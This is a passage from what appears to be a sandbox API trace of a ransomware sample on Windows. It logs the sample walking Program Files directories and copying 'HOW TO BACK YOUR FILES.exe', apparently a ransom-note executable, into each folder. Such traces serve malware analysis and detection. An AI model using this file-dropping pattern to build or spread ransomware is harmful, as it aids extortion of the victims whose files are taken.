cAlternateFileName="")) returned 0x2ccda8 [0074.726] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.726] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.727] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge" [0074.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e47f0 | out: hHeap=0x2b0000) returned 1 [0074.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0074.727] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 50 [0074.727] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge" [0074.727] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.727] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.735] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.735] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f465237, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e0bad80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e0bad80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.735] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.735] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.735] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" [0074.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0074.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0074.735] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 52 [0074.735] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" [0074.735] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.735] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.741] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.741] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fbd8be5, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e0e0ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e0e0ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.741] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.741] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.741] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles" [0074.741] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0074.741] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0074.742] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 57 [0074.742] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles" [0074.742] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.742] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.747] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.747] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa19a729d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e0e0ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e0e0ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.747] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.747] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.748] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle" [0074.748] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0074.748] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0074.748] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 52 [0074.748] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle" [0074.748] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.748] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.755] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.755] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0fd11ff, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e107040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e107040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.755] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.755] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.755] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" [0074.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4780 | out: hHeap=0x2b0000) returned 1 [0074.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0074.755] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 48 [0074.755] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" [0074.755] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.755] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.762] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.762] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a3fc59, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e107040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e107040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.762] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.762] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.762] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage" [0074.762] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0074.762] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0074.762] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned 52 [0074.762] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage" [0074.763] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.763] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.768] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.768] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f43efc8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e12d1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e12d1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.768] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.768] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.769] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" [0074.769] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0074.769] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0074.769] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 52 [0074.769] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" [0074.769] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.769] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.775] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.775] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa12338ef, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e12d1a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e12d1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.775] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.775] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.776] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" [0074.776] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0074.776] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0074.776] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 51 [0074.776] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: lpString1="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" [0074.776] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.776] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.784] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.784] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f9e8c42, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5e153300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e153300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.784] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.784] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.785] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\DVD Maker\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\DVD Maker\\en-US") returned="C:\\Program Files\\DVD Maker\\en-US" [0074.785] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee970 | out: hHeap=0x2b0000) returned 1 [0074.785] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0074.785] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\en-US") returned 32 [0074.785] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\DVD Maker\\en-US" | out: lpString1="C:\\Program Files\\DVD Maker\\en-US") returned="C:\\Program Files\\DVD Maker\\en-US" [0074.785] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.785] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\dvd maker\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.789] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.789] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5e153300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e153300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.789] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.789] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.789] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files") returned="C:\\Program Files\\Common Files" [0074.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e63f0 | out: hHeap=0x2b0000) returned 1 [0074.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0074.789] lstrlenW (lpString="C:\\Program Files\\Common Files") returned 29 [0074.789] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files" | out: lpString1="C:\\Program Files\\Common Files") returned="C:\\Program Files\\Common Files" [0074.789] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.789] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.793] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.793] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5e153300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e153300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.793] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.793] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.793] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\System", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\System") returned="C:\\Program Files\\Common Files\\System" [0074.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8a0 | out: hHeap=0x2b0000) returned 1 [0074.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0074.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\System") returned 36 [0074.794] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\System" | out: lpString1="C:\\Program Files\\Common Files\\System") returned="C:\\Program Files\\Common Files\\System" [0074.794] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.794] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\System\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\system\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.810] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.810] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5e179460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e179460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0074.810] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.810] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.810] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\System\\Ole DB", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\System\\Ole DB") returned="C:\\Program Files\\Common Files\\System\\Ole DB" [0074.811] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df8f0 | out: hHeap=0x2b0000) returned 1 [0074.811] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0074.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB") returned 43 [0074.811] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\System\\Ole DB" | out: lpString1="C:\\Program Files\\Common Files\\System\\Ole DB") returned="C:\\Program Files\\Common Files\\System\\Ole DB" [0074.811] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.811] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\system\\ole db\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.821] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.821] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5e19f5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e19f5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", 